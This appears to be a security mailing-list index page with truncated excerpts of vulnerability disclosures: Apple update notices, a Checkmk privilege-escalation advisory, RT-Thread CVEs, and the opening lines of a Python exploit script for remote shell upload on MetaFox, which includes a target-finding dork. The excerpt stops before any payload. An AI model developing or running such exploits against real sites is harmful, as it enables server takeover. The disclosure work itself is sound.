Posted by j0ck1ng@tempr.email on Mar 13
#!/usr/bin/env python3# Exploit Title: MetaFox Remote Shell Upload# Google Dork: “Social network for niche
communities”# Exploit Author: The Joker# Vendor Homepage: https://www.phpfox.com# Version: <= 5.1.8import jsonimport
requestsimport sysif len(sys.argv) != 4: sys.exit(“Usage: %s ” % sys.argv[0])
requests.packages.urllib3.disable_warnings()endpoint = sys.argv[1] + “/api/v1/user/login”response =…
Posted by SEC Consult Vulnerability Lab, Research via Fulldisclosure on Mar 13
SEC Consult Vulnerability Lab Security Advisory < 20240307-0 >
=======================================================================
title: Local Privilege Escalation via writable files
product: Checkmk Agent
vulnerable version: 2.0.0, 2.1.0, 2.2.0
fixed version: 2.1.0p40, 2.2.0p23, 2.3.0b1, 2.4.0b1
CVE number: CVE-2024-0670
impact: high
homepage: https://checkmk.com …
Posted by Marco Ivaldi on Mar 13
Hi,
Please find attached a security advisory that describes multiple
vulnerabilities we discovered in RT-Thread RTOS.
* Title: Multiple vulnerabilities in RT-Thread RTOS
* OS: RT-Thread <= 5.0.2
* Author: Marco Ivaldi <marco.ivaldi () hnsecurity it>
* Date: 2024-03-05
* CVE IDs and advisory URLs:
* CVE-2024-24334 – https://github.com/RT-Thread/rt-thread/issues/8282
* CVE-2024-24335 -…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-12-2024-1 GarageBand 10.4.11
GarageBand 10.4.11 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT214090 .
Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
GarageBand
Available for: macOS Ventura and macOS Sonoma
Impact: Processing a maliciously crafted file may lead to…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-7 visionOS 1.1
visionOS 1.1 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214087 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Accessibility
Available for: Apple Vision Pro
Impact: An app may be able to spoof system notifications and UI
Description: This…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-6 tvOS 17.4
tvOS 17.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214086 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Accessibility
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: A malicious app may be able to observe user data in log…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-5 watchOS 10.4
watchOS 10.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214088 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Accessibility
Available for: Apple Watch Series 4 and later
Impact: A malicious app may be able to observe user data in log…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4
macOS Monterey 12.7.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214083 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Admin Framework
Available for: macOS Monterey
Impact: An app may be able to elevate privileges
Description: A…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5
macOS Ventura 13.6.5 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214085 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Admin Framework
Available for: macOS Ventura
Impact: An app may be able to elevate privileges
Description: A…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-2 macOS Sonoma 14.4
macOS Sonoma 14.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214084 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Accessibility
Available for: macOS Sonoma
Impact: A malicious app may be able to observe user data in log entries…
Posts navigation
News, Advisories and much more